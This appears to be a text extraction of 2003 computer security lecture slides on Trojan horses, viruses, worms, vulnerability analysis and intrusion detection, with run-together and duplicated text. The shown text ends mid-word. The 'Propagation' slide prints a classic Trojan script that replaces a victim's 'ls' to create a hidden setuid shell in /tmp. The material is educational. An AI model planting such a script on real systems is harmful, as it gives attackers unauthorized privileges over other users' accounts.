November 13, 2003What is Malicious Code?Types of Malicious CodeTrojan HorsePropagationVirusVirus TypesVirus Types/PropertiesSlide 9WormsOther forms of malicious logicWhat do we Do?We can’t detect it: Now what? DetectionDetectionDefenseSlide 16Slide 17Slide 18Vulnerability AnalysisTechniques for Detecting VulnerabilitiesSystem VerificationPenetration TestingTypes/layers of Penetration TestingRed Team Approach Flaw Hypothesis Methodology:Problems with Penetration TestingVulnerability ClassificationExample flaw: xterm logExample: Finger Daemon (exploited by Morris worm)Vulnerability Classification: GeneralizeRISOS:Research Into Secure Operating Systems (Seven Classes)Protection Analysis Model ClassesPA flaw classesNRL TaxonomyNRL Taxonomy (Genesis)NRL Taxonomy: TimeNRL Taxonomy: LocationAslam’s ModelCommon Vulnerabilities and Exposures (cve.mitre.org)Buffer OverflowSlide 41Slide 42Intrusion Detection/ResponseIntrusion DetectionIDS Types: Anomaly DetectionAnomaly Detection: How do we determine normal?IDS Types: Misuse ModelingSpecification ModelingIDS SystemsIDS ArchitectureWhere is the Agent?IDS ProblemIntrusion ResponseContainmentEradicationFollow-UpCourtesy of Professors Chris Clifton & Matt BishopINFSCI 2935: Introduction of Computer Security1November 13, 2003November 13, 2003Malicious CodeMalicious CodeVulnerability AnalysisVulnerability AnalysisIntrusion DetectionIntrusion DetectionLecture 11Lecture 11INFSCI 2935: Introduction to Computer Security 2What is Malicious Code?What is Malicious Code?Set of instructions that causes a security policy Set of instructions that causes a security policy to be violated to be violated Is an unintentional mistake that violates policy malicious code? (Tricked into doing that?)What about “unwanted” code that doesn’t cause a security breach?Generally relies on “legal” operationsGenerally relies on “legal” operationsAuthorized user could perform operations without violating policyMalicious code “mimics” authorized userINFSCI 2935: Introduction to Computer Security 3Types of Malicious CodeTypes of Malicious CodeTrojan HorseTrojan HorseTrick user into executing malicious codeVirusVirusReplicates and inserts itself into fixed set of filesWormWormCopies itself from computer to computerINFSCI 2935: Introduction to Computer Security 4Trojan HorseTrojan HorseProgram with an overt (expected) and covert Program with an overt (expected) and covert (unexpected) effect(unexpected) effectAppears normal/expectedCovert effect violates security policyUser tricked into executing Trojan horseUser tricked into executing Trojan horseExpects (and sees) overt behaviorCovert effect performed with user’s authorizationTrojan horse may replicateTrojan horse may replicateCreate copy on executionSpread to other users/systemsINFSCI 2935: Introduction to Computer Security 5PropagationPropagationPerpetratorcat >/homes/victim/ls <<eofcat >/homes/victim/ls <<eofcp /bin/sh /tmp/.xxshcp /bin/sh /tmp/.xxshchmod u+s,o+x /tmp/.xxshchmod u+s,o+x /tmp/.xxshrm ./lsrm ./lsls $*ls $*eofeofVictimlslsIt is a violation to trick someone into creating a shell that It is a violation to trick someone into creating a shell that is is setuidsetuid to themselves to themselvesHow to replicate this?How to replicate this?INFSCI 2935: Introduction to Computer Security 6VirusVirusSelf-replicating codeSelf-replicating codeA freely propagating Trojan horsesome disagree that it is a Trojan horseInserts itself into another fileAlters normal code with “infected” versionOperates when infected code executedOperates when infected code executedIf spread condition thenFor target filesif not infected then alter to include virusPerform malicious actionExecute normal programINFSCI 2935: Introduction to Computer Security 7Virus TypesVirus TypesBoot Sector Infectors (The Brain Virus)Boot Sector Infectors (The Brain Virus)Problem: How to ensure virus “carrier” executed?Solution: Place in boot sector of diskRun on any bootPropagate by altering boot disk creationLess common with few boots off floppiesExecutable infector (The Jerusalem Virus, Friday 13Executable infector (The Jerusalem Virus, Friday 13thth, , not 1987 )not 1987 )Malicious code placed at beginning of legitimate program (.COM .EXE files)Runs when application runApplication then runs normallyMultipartite virus : boot sector + executable infectorMultipartite virus : boot sector + executable infectorINFSCI 2935: Introduction to Computer Security 8Virus Types/PropertiesVirus Types/PropertiesTerminate and Stay ResidentTerminate and Stay ResidentStays active in memory after application completeAllows infection of previously unknown filesTrap calls that execute a programCan be boot sector infectors or executable infectors (Brain and Jerusalem)Stealth (an executable infector)Stealth (an executable infector)Conceal InfectionTrap read to provide disinfected fileLet execute call infected fileEncrypted virusEncrypted virusPrevents “signature” to detect virus[Deciphering routine, Enciphered virus code, Deciphering Key]PolymorphismPolymorphismChange virus code to something equivalent each time it propagatesINFSCI 2935: Introduction to Computer Security 9Virus Types/PropertiesVirus Types/PropertiesMacro Virus Macro Virus Composed of a sequence of instructions that is interpreted rather than executed directlyInfected “executable” isn’t machine codeRelies on something “executed” inside application dataExample: Melissa virus infected Word 97/98 docsOtherwise similar properties to other virusesOtherwise similar properties to other virusesArchitecture-independentApplication-dependentINFSCI 2935: Introduction to Computer Security 10WormsWormsReplicates from one computer to anotherReplicates from one computer to anotherSelf-replicating: No user action requiredVirus: User performs “normal” actionTrojan horse: User tricked into performing actionCommunicates/spreads using standard Communicates/spreads using standard protocolsprotocolsINFSCI 2935: Introduction to Computer Security 11Other forms of malicious logicOther forms of malicious logicWe’ve discussed how they propagateWe’ve discussed how they propagateBut what do they do?Rabbits/BacteriaRabbits/BacteriaExhaust system resources of some classDenial